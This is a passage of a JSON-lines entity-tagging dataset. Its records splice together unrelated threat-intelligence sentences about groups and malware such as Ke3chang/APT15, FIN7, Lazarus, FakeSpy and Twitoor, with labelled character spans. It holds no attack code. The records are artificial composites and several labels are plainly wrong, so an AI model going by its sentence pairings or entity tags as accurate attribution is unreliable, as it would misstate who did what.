MyWeb is the second-generation malware used by Ke3chang .", "spans": [{"start": 19, "end": 26, "label": "Malware"}, {"start": 230, "end": 234, "label": "Organization"}, {"start": 248, "end": 257, "label": "System"}, {"start": 266, "end": 288, "label": "System"}, {"start": 292, "end": 302, "label": "System"}, {"start": 401, "end": 406, "label": "Malware"}, {"start": 448, "end": 456, "label": "Organization"}]} {"text": "Some emulators build their phone number out of the default number created in the emulator software and the port number : 5554 . getMachine function using anti-emulator technique . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . Ministries of foreign affairs in Europe have been targeted and compromised by a threat actor we call Ke3chang .", "spans": [{"start": 107, "end": 125, "label": "Indicator"}, {"start": 180, "end": 188, "label": "Organization"}, {"start": 287, "end": 291, "label": "Organization"}, {"start": 302, "end": 331, "label": "Organization"}, {"start": 403, "end": 411, "label": "Organization"}]} {"text": "UNDER ACTIVE DEVELOPMENT An analysis comparing new FakeSpy samples with old ones showed code discrepancies and new features . This threat actor is suspected of stealing \u20ac13 million from Bank of Valletta , Malta earlier this year . This attack used the crisis in Syria as a lure to deliver malware to its targets .", "spans": [{"start": 51, "end": 58, "label": "Malware"}, {"start": 131, "end": 143, "label": "Organization"}, {"start": 186, "end": 190, "label": "Organization"}]} {"text": "These artifacts indicate that FakeSpy 's campaign is still live and under development . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . 
Tracking the malicious activities of the elusive Ke3chang APT group , ESET researchers have discovered new versions of malware families linked to the group , and a previously unreported backdoor .", "spans": [{"start": 30, "end": 37, "label": "Malware"}, {"start": 98, "end": 106, "label": "Malware"}, {"start": 141, "end": 149, "label": "Malware"}, {"start": 261, "end": 264, "label": "Malware"}, {"start": 331, "end": 339, "label": "Organization"}, {"start": 352, "end": 356, "label": "Organization"}]} {"text": "The newer version of FakeSpy uses new URL addresses for malicious communication with FakeSpy . They also use AutoIT droppers , password-protected EXE files and even ISO images . Furthermore , FireEye has presented evidence indicating that the Ke3chang attackers have been active since at least 2010 and have attacked targets related to G20 meetings in the past .", "spans": [{"start": 21, "end": 28, "label": "Malware"}, {"start": 85, "end": 92, "label": "Malware"}, {"start": 95, "end": 99, "label": "Organization"}, {"start": 109, "end": 124, "label": "System"}, {"start": 192, "end": 199, "label": "Organization"}, {"start": 243, "end": 251, "label": "Organization"}, {"start": 252, "end": 261, "label": "Organization"}, {"start": 336, "end": 348, "label": "Organization"}]} {"text": "The function main uses a DES encryption algorithm to encode these addresses . To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . 
During our brief window of visibility into one of the known 22 CnC nodes , FireEye observed the Ke3chang conducting reconnaissance and moving laterally throughout the compromised networks .", "spans": [{"start": 109, "end": 124, "label": "Organization"}, {"start": 129, "end": 149, "label": "System"}, {"start": 172, "end": 184, "label": "System"}, {"start": 195, "end": 204, "label": "System"}, {"start": 267, "end": 281, "label": "Vulnerability"}, {"start": 287, "end": 296, "label": "System"}, {"start": 396, "end": 403, "label": "Organization"}, {"start": 417, "end": 425, "label": "Organization"}]} {"text": "The examples below show the plaintext key \u201c TEST \u201d to decrypt encoded hexadecimal strings ( jUtils.decrypt ( ) ) . Interestingly , this actor targeted financial entities and companies in one African country , which led us to think that CopyPaste was associated with cybermercenaries or a training center . Ke3chang attackers are operating within China .", "spans": [{"start": 136, "end": 141, "label": "Organization"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 307, "end": 315, "label": "Organization"}, {"start": 316, "end": 325, "label": "Organization"}]} {"text": "These encoded strings contain the new URL addresses not seen in older versions of FakeSpy . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called \u201c CopyPaste \u201d from a previously unknown APT . In May 2017 , NCC Group 's Incident Response team reacted to an ongoing incident .", "spans": [{"start": 82, "end": 89, "label": "Malware"}, {"start": 137, "end": 141, "label": "Organization"}, {"start": 287, "end": 317, "label": "Organization"}]} {"text": "Comparing strings from an old FakeSpy sample to a new one . FIN7 and Cobalt used decoy 302 HTTP redirections too , FIN7 on its GRIFFON C2s before January 2018 , and Cobalt , on its staging servers , similar to CopyPaste . 
which provides a range of services to UK Government .", "spans": [{"start": 30, "end": 37, "label": "Malware"}, {"start": 60, "end": 64, "label": "Organization"}, {"start": 69, "end": 75, "label": "Organization"}, {"start": 115, "end": 119, "label": "Organization"}, {"start": 260, "end": 273, "label": "Organization"}]} {"text": "WHO IS BEHIND FAKESPY \u2019 S SMISHING CAMPAIGNS ? Quite recently , FIN7 threat actors typosquatted the brand \u201c Digicert \u201d using the domain name digicert-cdn[.]com , which is used as a command and control server for their GRIFFON implants . APT15 was targeting information related to UK government departments and military technology .", "spans": [{"start": 14, "end": 21, "label": "Malware"}, {"start": 64, "end": 68, "label": "Organization"}, {"start": 108, "end": 116, "label": "Organization"}, {"start": 181, "end": 188, "label": "System"}, {"start": 193, "end": 207, "label": "System"}, {"start": 237, "end": 242, "label": "Organization"}, {"start": 283, "end": 293, "label": "Organization"}, {"start": 310, "end": 329, "label": "Organization"}]} {"text": "The Cybereason Nocturnus team suspects that the malware operators and authors are Chinese speakers . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . backdoors that now appear to be part of APT15 's toolset .", "spans": [{"start": 4, "end": 24, "label": "Organization"}, {"start": 137, "end": 141, "label": "Organization"}, {"start": 175, "end": 192, "label": "Organization"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 289, "end": 294, "label": "Organization"}]} {"text": "Our findings , along with previous research , indicate that the threat actor behind these recent campaigns is likely a Chinese group dubbed \u201c Roaming Mantis \u201d . 
The second one is CobaltGoblin / Carbanak / EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . This report demonstrates that Ke3chang is able to successfully penetrate government targets using exploits for vulnerabilities that have already been patched and despite the fact that these ministries have defenses in place .", "spans": [{"start": 142, "end": 156, "label": "Organization"}, {"start": 179, "end": 191, "label": "Organization"}, {"start": 194, "end": 202, "label": "Organization"}, {"start": 205, "end": 217, "label": "Organization"}, {"start": 305, "end": 314, "label": "Organization"}, {"start": 403, "end": 411, "label": "Organization"}, {"start": 446, "end": 456, "label": "Organization"}]} {"text": "Roaming Mantis is believed to be a Chinese threat actor group first discovered in April 2018 that has continuously evolved . We observe , with various levels of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . RoyalDNS - required APT15 .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 125, "end": 127, "label": "Organization"}, {"start": 212, "end": 218, "label": "Organization"}, {"start": 230, "end": 246, "label": "System"}, {"start": 260, "end": 274, "label": "System"}, {"start": 307, "end": 315, "label": "Malware"}, {"start": 327, "end": 332, "label": "Organization"}]} {"text": "In the beginning , this threat group mainly targeted Asian countries . The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which led us to think that CopyPaste was associated with cybermercenaries or a training center . 
The Ke3chang group also used keyloggers and their own .NET tool to enumerate folders and dump data from Microsoft Exchange mailboxes .", "spans": [{"start": 110, "end": 119, "label": "Organization"}, {"start": 141, "end": 150, "label": "Organization"}, {"start": 164, "end": 173, "label": "Organization"}, {"start": 279, "end": 294, "label": "Organization"}, {"start": 301, "end": 315, "label": "Organization"}, {"start": 326, "end": 336, "label": "Malware"}, {"start": 351, "end": 360, "label": "Malware"}, {"start": 401, "end": 410, "label": "Organization"}]} {"text": "Now , they are expanding their activity to audiences all around the world . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims\u2019 networks . APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets .", "spans": [{"start": 101, "end": 108, "label": "Organization"}, {"start": 133, "end": 145, "label": "System"}, {"start": 155, "end": 165, "label": "System"}, {"start": 228, "end": 233, "label": "Organization"}, {"start": 258, "end": 266, "label": "Malware"}]} {"text": "As part of their activities , they are known for hijacking DNS settings on Japanese routers that redirect users to malicious IP addresses , creating disguised malicious Android apps that appear as popular apps , stealing Apple ID credentials by creating Apple phishing pages , as well as performing web crypto mining on browsers . FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . 
This time , APT15 opted for a DNS-based backdoor : RoyalDNS .", "spans": [{"start": 169, "end": 176, "label": "System"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 254, "end": 259, "label": "Organization"}, {"start": 331, "end": 335, "label": "Organization"}, {"start": 483, "end": 488, "label": "Organization"}, {"start": 501, "end": 519, "label": "Malware"}, {"start": 522, "end": 530, "label": "Malware"}]} {"text": "CONNECTION TO CHINA Chinese server infrastructure : FakeSpy applications send stolen information to C2 domains with .club TLDs and URLs ending with /servlet/ [ C2 Command ] ( mentioned above in the \u201c Stealing Sensitive Information \u201d section ) . MuddyWater is widely regarded as a long-lived APT group in the Middle East . APT15 then used a tool known as RemoteExec .", "spans": [{"start": 52, "end": 59, "label": "Malware"}, {"start": 116, "end": 126, "label": "Indicator"}, {"start": 148, "end": 172, "label": "Indicator"}, {"start": 245, "end": 255, "label": "Organization"}, {"start": 322, "end": 327, "label": "Organization"}, {"start": 354, "end": 364, "label": "Malware"}]} {"text": "All of these domains are registered to \u2018 Li Jun Biao \u2019 on Bizcn , Inc , a Chinese Internet application service provider . From February to April 2019 , MuddyWater launched a series of spear-phishing attacks against governments , educational institutions , financial , telecommunications and defense companies in Turkey , Iran , Afghanistan , Iraq , Tajikistan and Azerbaijan . 
APT15 then used a tool known as RemoteExec ( similar to Microsoft .", "spans": [{"start": 58, "end": 69, "label": "Organization"}, {"start": 152, "end": 162, "label": "Organization"}, {"start": 215, "end": 226, "label": "Organization"}, {"start": 229, "end": 253, "label": "Organization"}, {"start": 256, "end": 265, "label": "Organization"}, {"start": 268, "end": 286, "label": "Organization"}, {"start": 291, "end": 298, "label": "Organization"}, {"start": 377, "end": 382, "label": "Organization"}, {"start": 409, "end": 419, "label": "Malware"}, {"start": 433, "end": 442, "label": "Organization"}]} {"text": "Chinese language traces in the code : During the investigation , the Cybereason Nocturnus team discovered code artifacts that may indicate Chinese threat actors . FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . Coincidentally , following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare , we have found evidence of very recent activity by a group referred to as APT15 , known for committing cyber espionage which is believed to be affiliated with the Chinese government .", "spans": [{"start": 69, "end": 89, "label": "Organization"}, {"start": 163, "end": 167, "label": "Organization"}, {"start": 354, "end": 358, "label": "Organization"}, {"start": 501, "end": 506, "label": "Organization"}, {"start": 530, "end": 545, "label": "Organization"}]} {"text": "For example , we found several suspicious strings written in the Chinese language in a function called isNetworkAvailable , previously discussed in this blog : An almost identical function is mentioned in earlier research , which ties FakeSpy and other malware to the Roaming Mantis group . 
We also unearthed and detailed our other findings on MuddyWater , such as its connection to four Android malware variants and its use of false flag techniques , among others , in our report New MuddyWater Activities Uncovered: Threat Actors Used Multi-Stage Backdoors , False Flags , Android Malware , and More . APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more .", "spans": [{"start": 235, "end": 242, "label": "Malware"}, {"start": 268, "end": 282, "label": "Organization"}, {"start": 344, "end": 354, "label": "Organization"}, {"start": 388, "end": 403, "label": "System"}, {"start": 537, "end": 558, "label": "System"}, {"start": 561, "end": 572, "label": "System"}, {"start": 575, "end": 590, "label": "System"}, {"start": 604, "end": 609, "label": "Organization"}, {"start": 634, "end": 648, "label": "Organization"}, {"start": 763, "end": 775, "label": "Organization"}, {"start": 778, "end": 800, "label": "Organization"}, {"start": 803, "end": 811, "label": "Organization"}]} {"text": "Chinese APK names : Some of FakeSpy \u2019 s APK package names contain anglicized Chinese ( Mandarin ) words that might be related to Chinese songs and lyrics , food , provinces , etc . Instead , the campaign used compromised legitimate accounts to trick victims into installing malware . Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": [{"start": 28, "end": 35, "label": "Malware"}, {"start": 209, "end": 240, "label": "System"}, {"start": 314, "end": 325, "label": "Organization"}, {"start": 328, "end": 336, "label": "Organization"}, {"start": 339, "end": 348, "label": "Organization"}, {"start": 355, "end": 369, "label": "Organization"}]} {"text": "CONCLUSIONS FakeSpy was first seen in October 2017 and until recently mainly targeted East Asian countries . 
Notably , the group\u2019s use of email as an infection vector seems to yield success for their campaigns . Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon .", "spans": [{"start": 12, "end": 19, "label": "Malware"}, {"start": 123, "end": 130, "label": "Organization"}, {"start": 138, "end": 143, "label": "System"}, {"start": 242, "end": 253, "label": "Organization"}, {"start": 256, "end": 264, "label": "Organization"}, {"start": 267, "end": 276, "label": "Organization"}, {"start": 283, "end": 297, "label": "Organization"}]} {"text": "Our research shows fresh developments in the malware \u2019 s code and sophistication , as well as an expansion to target Europe and North America . We also observed MuddyWater\u2019s use of multiple open-source post-exploitation tools , which they deployed after successfully compromising a target . There are many articles and research online about APT15 and their activities , the most recent one by NCC Group .", "spans": [{"start": 161, "end": 173, "label": "Organization"}, {"start": 202, "end": 225, "label": "System"}, {"start": 341, "end": 346, "label": "Organization"}, {"start": 393, "end": 402, "label": "Organization"}]} {"text": "This mobile malware masquerades as legitimate , trusted postal service applications so that it can gain the users\u2019 trust . The attacker also connected to the compromised servers from IP addresses that were linked to dynamic domain names used as C&Cs by the delivered payloads . 
There are many articles and research online about APT15 and their activities , the most recent one by NCC Group ; although posted in March 2018 , it refers to a campaign in 2017 .", "spans": [{"start": 127, "end": 135, "label": "Organization"}, {"start": 257, "end": 275, "label": "System"}, {"start": 328, "end": 333, "label": "Organization"}, {"start": 380, "end": 389, "label": "Organization"}]} {"text": "Once it has been installed , it requests permissions from the user so that it can steal sensitive data , manipulate SMS messages , and potentially infect contacts of the user . The main payload is usually Imminent Monitor RAT; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . both attributed to Chinese government affiliated groups .", "spans": [{"start": 214, "end": 226, "label": "Malware"}, {"start": 292, "end": 310, "label": "Malware"}, {"start": 313, "end": 324, "label": "Malware"}, {"start": 331, "end": 336, "label": "Malware"}]} {"text": "The malware now targets more countries all over the world by masquerading as official post office and transportation services apps . In a case in June 2019 , we also noticed Warzone RAT being used . DLL hijacking techniques have been seen in the past with the APT15 group .", "spans": [{"start": 174, "end": 185, "label": "Malware"}, {"start": 260, "end": 271, "label": "Organization"}]} {"text": "These apps appear legitimate due to their app logo , UI appearance , and redirects to the carrier webpage -- all luring end users to believe it \u2019 s the original one . Xpert RAT reportedly first appeared in 2011 . 
cyber actors of the North Korean government to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally .", "spans": [{"start": 167, "end": 176, "label": "Malware"}, {"start": 213, "end": 225, "label": "Organization"}, {"start": 271, "end": 276, "label": "Organization"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 291, "end": 300, "label": "Organization"}, {"start": 307, "end": 338, "label": "Organization"}]} {"text": "In this blog , we showed that the threat actor behind the recent FakeSpy campaign is a Chinese-speaking group called \u201c Roaming Mantis \u201d known to operate mainly in Asia . The first version of \u201c Proyecto RAT \u201d was published at the end of 2010 . The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA .", "spans": [{"start": 65, "end": 72, "label": "Malware"}, {"start": 119, "end": 133, "label": "Organization"}, {"start": 193, "end": 205, "label": "Malware"}, {"start": 247, "end": 262, "label": "Organization"}, {"start": 336, "end": 348, "label": "Organization"}]} {"text": "It is interesting to see that the group has expanded their operation to other regions , such as the United States and Europe . But with the West African gang we\u2019ve named Scattered Canary , we have a deeper look at how business email compromise is connected to the rest of the cybercrime . 
Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware .", "spans": [{"start": 170, "end": 186, "label": "Organization"}, {"start": 320, "end": 339, "label": "Organization"}, {"start": 348, "end": 360, "label": "Malware"}, {"start": 363, "end": 373, "label": "Malware"}, {"start": 376, "end": 395, "label": "Malware"}, {"start": 398, "end": 402, "label": "Malware"}, {"start": 411, "end": 416, "label": "Malware"}, {"start": 417, "end": 424, "label": "Malware"}]} {"text": "The malware authors seem to be putting a lot of effort into improving this malware , bundling it with numerous new upgrades that make it more sophisticated , evasive , and well-equipped . In a recent report , the FBI\u2019s Internet Crime Complaint Center (IC3) reported that more than 20 , 000 businesses lost nearly $1.3 billion to BEC attacks in 2018 . Variants of malware and tools used by HIDDEN COBRA actors include Destover and Hangman .", "spans": [{"start": 213, "end": 218, "label": "Organization"}, {"start": 290, "end": 300, "label": "Organization"}, {"start": 389, "end": 408, "label": "Organization"}, {"start": 417, "end": 425, "label": "Malware"}, {"start": 430, "end": 437, "label": "Malware"}]} {"text": "These improvements render FakeSpy one of the most powerful information stealers on the market . This investigation by the Agari Cyber Intelligence Division into the cybercriminal group we\u2019ve named Scattered Canary offers unprecedented visibility into eleven years of fraud and criminal activities , and the growth of a 419 startup into a fully operational BEC business . 
DHS has previously released Alert TA14-353A .", "spans": [{"start": 26, "end": 33, "label": "Malware"}, {"start": 122, "end": 146, "label": "Organization"}, {"start": 179, "end": 184, "label": "Organization"}, {"start": 197, "end": 213, "label": "Organization"}, {"start": 360, "end": 368, "label": "Organization"}, {"start": 371, "end": 374, "label": "Organization"}]} {"text": "We anticipate this malware to continue to evolve with additional new features ; the only question now is when we will see the next wave . While this criminal organization\u2019s activities now center around BEC , and extend to romance scams , credit card fraud , check fraud , fake job listings , credential harvesting , tax schemes , and more , these actors came from much humbler beginnings , starting with basic Craigslist scams in 2008 . The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report .", "spans": [{"start": 158, "end": 172, "label": "Organization"}, {"start": 490, "end": 497, "label": "Organization"}]} {"text": "First Twitter\u2011controlled Android botnet discovered Detected by ESET as Android/Twitoor , this malware is unique because of its resilience mechanism . On November 29 , 2018 , Scattered Canary sent an attack email to Agari CFO Raymond Lim , enquiring as to his availability to send out a domestic wire transfer . 
Our analysis shows that the cybercriminals behind the attack against an online casino in Central America , and several other targets in late-2017 , were most likely the infamous Lazarus hacking group .", "spans": [{"start": 6, "end": 24, "label": "System"}, {"start": 25, "end": 32, "label": "System"}, {"start": 63, "end": 67, "label": "Organization"}, {"start": 71, "end": 86, "label": "Malware"}, {"start": 174, "end": 190, "label": "Organization"}, {"start": 339, "end": 353, "label": "Organization"}, {"start": 489, "end": 510, "label": "Organization"}]} {"text": "Instead of being controlled by a traditional command-and-control server , it receives instructions via tweets . Many feel that they have a home team advantage living in Nigeria , where they are free to pay off law enforcement to look the other way . The Lazarus Group was first identified in Novetta 's report Operation Blockbuster in February 2016 .", "spans": [{"start": 185, "end": 189, "label": "Organization"}, {"start": 254, "end": 267, "label": "Organization"}, {"start": 292, "end": 299, "label": "Organization"}]} {"text": "24 Aug 2016 - 02:05PM Android/Twitoor is a backdoor capable of downloading other malware onto an infected device . Scattered Canary\u2019s fraudulent history can be traced as far back as October 2008 , when the group first arrived on the cybercriminal circuit . cyberattacks against high-value targets in Ukraine in December 2015 and December 2016 .", "spans": [{"start": 22, "end": 37, "label": "Malware"}, {"start": 115, "end": 133, "label": "Organization"}, {"start": 206, "end": 211, "label": "Organization"}]} {"text": "It has been active for around one month . By March 2016 , one of Scattered Canary\u2019s members had built enough trust with a romance victim\u2014who we\u2019ll call Jane\u2014that she became a frequent source of new mule accounts for the group . 
In all of these incidents , the Lazarus utilized similar toolsets , including KillDisk that was executed on compromised machines .", "spans": [{"start": 65, "end": 83, "label": "Organization"}, {"start": 220, "end": 225, "label": "Organization"}, {"start": 260, "end": 267, "label": "Organization"}, {"start": 306, "end": 314, "label": "Malware"}]} {"text": "This malicious app , detected by ESET as a variant of Android/Twitoor.A , can \u2019 t be found on any official Android app store \u2013 it probably spreads by SMS or via malicious URLs . Alpha\u2019s early role was fairly simple: engage with individuals , who he chose based on the goods they were selling , and then provide personal shipping addresses back to Omega . We are confident this KillDisk malware was deployed by Lazarus , rather than by another , unrelated attacker .", "spans": [{"start": 33, "end": 37, "label": "Organization"}, {"start": 54, "end": 71, "label": "Malware"}, {"start": 107, "end": 124, "label": "System"}, {"start": 178, "end": 185, "label": "Organization"}, {"start": 377, "end": 385, "label": "Malware"}, {"start": 386, "end": 393, "label": "Malware"}, {"start": 410, "end": 417, "label": "Organization"}, {"start": 455, "end": 463, "label": "Organization"}]} {"text": "It impersonates a porn player app or MMS application but without having their functionality . By all accounts , late 2015 was the beginning of BEC for Scattered Canary . This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack ( we didn't see these exact samples anywhere else ) .", "spans": [{"start": 151, "end": 167, "label": "Organization"}, {"start": 270, "end": 277, "label": "Organization"}]} {"text": "After launching , it hides its presence on the system and checks the defined Twitter account at regular intervals for commands . The first type of attack Scattered Canary pivoted to was credential phishing . 
Utilizing KillDisk in the attack scenario most likely served one of two purposes : the attackers covering their tracks after an espionage operation , or it was used directly for extortion or cyber-sabotage .", "spans": [{"start": 77, "end": 84, "label": "System"}, {"start": 154, "end": 170, "label": "Organization"}, {"start": 218, "end": 226, "label": "Malware"}, {"start": 295, "end": 304, "label": "Organization"}, {"start": 399, "end": 413, "label": "Organization"}]} {"text": "Based on received commands , it can either download malicious apps or switch the C & C Twitter account to another one . Between July 2015 and February 2016 , Scattered Canary\u2019s primary focus seemed to be mass harvesting general credentials using a Google Docs phishing page . Today we'd like to share some of our findings , and add something new to what 's currently common knowledge about Lazarus Group activities , and their connection to the much talked about February 2016 incident , when an unknown attacker attempted to steal up to $851M USD from Bangladesh Central Bank .", "spans": [{"start": 87, "end": 94, "label": "System"}, {"start": 158, "end": 176, "label": "Organization"}, {"start": 504, "end": 512, "label": "Organization"}, {"start": 553, "end": 576, "label": "Organization"}]} {"text": "\u201c Using Twitter instead of command-and-control ( C & C ) servers is pretty innovative for an Android botnet. \u201d \u201c Using Twitter instead of command-and-control ( C & C ) servers is pretty innovative for an Android botnet , \u201d says Luk\u00e1\u0161 \u0160tefanko , the ESET malware researcher who discovered the malicious app . In the first few months of their credential phishing ventures , Scattered Canary\u2019s sights were mostly set on Asian targets\u2014Malaysia and Japan , in particular . 
Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist .", "spans": [{"start": 8, "end": 15, "label": "System"}, {"start": 93, "end": 100, "label": "System"}, {"start": 119, "end": 126, "label": "Organization"}, {"start": 204, "end": 211, "label": "System"}, {"start": 249, "end": 253, "label": "Organization"}, {"start": 372, "end": 390, "label": "Organization"}, {"start": 568, "end": 581, "label": "Organization"}, {"start": 601, "end": 605, "label": "Organization"}]} {"text": "Malware that enslaves devices to form botnets needs to be able to receive updated instructions . In November 2015 , the group started to focus on North American users , mostly in the United States . However , from this it 's only clear that Lazarus might have attacked Polish banks .", "spans": [{"start": 120, "end": 125, "label": "Organization"}, {"start": 241, "end": 248, "label": "Organization"}, {"start": 276, "end": 281, "label": "Organization"}]} {"text": "That communication is an Achilles heel for any botnet \u2013 it may raise suspicion and , cutting the bots off is always lethal to the botnet \u2019 s functioning . This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": [{"start": 230, "end": 246, "label": "Organization"}, {"start": 291, "end": 299, "label": "Organization"}, {"start": 326, "end": 333, "label": "Organization"}, {"start": 371, "end": 380, "label": "Organization"}]} {"text": "Additionally , should the command-and-control ( C & C ) servers get seized by the authorities , it would ultimately lead to disclosing information about the entire botnet . In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . 
Considering that the afterhack publications by the media mentioned that the investigation stumbled upon three different attackers , it was not obvious whether Lazarus was the one responsible for the fraudulent SWIFT transactions , or if Lazarus had in fact developed its own malware to attack banks ' systems .", "spans": [{"start": 184, "end": 200, "label": "Organization"}, {"start": 269, "end": 277, "label": "Vulnerability"}, {"start": 339, "end": 344, "label": "Organization"}, {"start": 408, "end": 417, "label": "Organization"}, {"start": 447, "end": 454, "label": "Organization"}, {"start": 525, "end": 532, "label": "Organization"}, {"start": 581, "end": 586, "label": "Organization"}]} {"text": "To make the Twitoor botnet \u2019 s communication more resilient , botnet designers took various steps like encrypting their messages , using complex topologies of the C & C network \u2013 or using innovative means for communication , among them the use of social networks . For over eighteen months from March 2017 until November 2018 , Scattered Canary\u2019s frequent enterprise-focused credential phishing campaigns almost exclusively targeted businesses in the United States and Canada . We would like to add some strong facts that link some attacks on banks to Lazarus , and share some of our own findings as well as shed some light on the recent TTPs used by the attacker , including some yet unpublished details from the attack in Europe in 2017 .", "spans": [{"start": 12, "end": 19, "label": "Malware"}, {"start": 328, "end": 346, "label": "Organization"}, {"start": 543, "end": 548, "label": "Organization"}, {"start": 552, "end": 559, "label": "Organization"}, {"start": 655, "end": 663, "label": "Organization"}]} {"text": "\u201c These communication channels are hard to discover and even harder to block entirely . 
In July 2018 , following a trend we have observed across the entire BEC threat landscape , Scattered Canary changed their preferred cash out mechanism from wire transfers to gift cards . Lazarus attacks are not a local problem and clearly the group 's operations span across the whole world .", "spans": [{"start": 179, "end": 195, "label": "Organization"}]} {"text": "On the other hand , it \u2019 s extremely easy for the crooks to re-direct communications to another freshly created account , \u201d explains \u0160tefanko . Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Lazarus was previously known to conduct cyberespionage and cybersabotage activities , such as attacks on Sony Pictures Entertainment with volumes of internal data leaked , and many system harddrives in the company wiped .", "spans": [{"start": 239, "end": 255, "label": "Organization"}, {"start": 361, "end": 368, "label": "Organization"}, {"start": 466, "end": 493, "label": "Organization"}]} {"text": "In the Windows space , Twitter , founded in 2006 , was first used to control botnets as early as in 2009 . Using personal information obtained from various sources , Scattered Canary started perpetrating fraud against US federal and state government agencies . 
We believe that Lazarus Group is very large and works mainly on infiltration and espionage operations , while a substantially smaller units within the group , which we have dubbed Bluenoroff , is responsible for financial profit .", "spans": [{"start": 7, "end": 14, "label": "System"}, {"start": 23, "end": 30, "label": "Organization"}, {"start": 166, "end": 182, "label": "Organization"}, {"start": 233, "end": 258, "label": "Organization"}, {"start": 277, "end": 290, "label": "Organization"}, {"start": 441, "end": 451, "label": "Organization"}]} {"text": "Android bots have also already been found being controlled via other non-traditional means \u2013 blogs or some of the many cloud messaging systems like Google \u2019 s or Baidu \u2019 s \u2013 but Twitoor is the first Twitter-based bot malware , according to \u0160tefanko . In total , 35 actors have been tied to Scattered Canary\u2019s operations since the group emerged in 2008 . Lazarus regrouped and rushed into new countries , selecting mostly poorer and less developed locations , hitting smaller banks because they are , apparently , easy prey .", "spans": [{"start": 0, "end": 7, "label": "System"}, {"start": 148, "end": 154, "label": "Organization"}, {"start": 162, "end": 167, "label": "Organization"}, {"start": 178, "end": 185, "label": "Malware"}, {"start": 199, "end": 212, "label": "System"}, {"start": 290, "end": 308, "label": "Organization"}, {"start": 354, "end": 361, "label": "Organization"}, {"start": 475, "end": 480, "label": "Organization"}]} {"text": "\u201c In the future , we can expect that the bad guys will try to make use of Facebook statuses or deploy LinkedIn and other social networks \u201d , states ESET \u2019 s researcher . Just as with romance scams , actors make use of scripts and templates they can copy-and-paste without having to create something on their own . 
To date , the Lazarus group has been one of the most successful in launching large scale operations against the financial industry .", "spans": [{"start": 74, "end": 82, "label": "System"}, {"start": 102, "end": 110, "label": "System"}, {"start": 148, "end": 152, "label": "Organization"}, {"start": 199, "end": 205, "label": "Organization"}, {"start": 218, "end": 225, "label": "System"}, {"start": 230, "end": 239, "label": "System"}, {"start": 328, "end": 341, "label": "Organization"}, {"start": 426, "end": 444, "label": "Organization"}]} {"text": "Currently , the Twitoor trojan has been downloading several versions of mobile banking malware . When it comes to engaging targets , Scattered Canary frequently maximized efficiencies through the use of scripts , or as some members of the group call them , formats.\u201d These formats are templated text documents that can contain several layers of phishing messages to send to potential victims . We believe that Lazarus will remain one of the biggest threats to the banking sector , finance , and trading companies , as well as casinos for the next few years .", "spans": [{"start": 16, "end": 23, "label": "Malware"}, {"start": 133, "end": 149, "label": "Organization"}, {"start": 410, "end": 417, "label": "Organization"}, {"start": 464, "end": 478, "label": "Organization"}, {"start": 481, "end": 488, "label": "Organization"}, {"start": 495, "end": 512, "label": "Organization"}, {"start": 526, "end": 533, "label": "Organization"}]} {"text": "However , the botnet operators can start distributing other malware , including ransomware , at any time warns \u0160tefanko . Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group . 
We believe Lazarus started this watering hole attack at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": [{"start": 186, "end": 191, "label": "System"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 246, "end": 253, "label": "Organization"}]} {"text": "\u201c Twitoor serves as another example of how cybercriminals keep on innovating their business , \u201d Stefanko continues . If Scattered Canary can be seen as a microcosm for the rapidly evolving organizations behind today\u2019s most pernicious email scams , this report demonstrates that a much more holistic approach\u2014one based on threat actor identity rather than type of fraudulent activity\u2014is required to detect email fraud and protect organizations . We believe they started this watering hole campaign at the end of 2016 after their other operation was interrupted in South East Asia .", "spans": [{"start": 2, "end": 9, "label": "Malware"}, {"start": 120, "end": 136, "label": "Organization"}]} {"text": "\u201c The takeaway ? This is a first for an APT group , and shows Sednit has access to very sophisticated tools to conduct its espionage operations . A rudimentary but somewhat clever design , KiloAlfa provides keylogging capability for the Lazarus Group 's collection of malicious tools .", "spans": [{"start": 62, "end": 68, "label": "Organization"}, {"start": 88, "end": 107, "label": 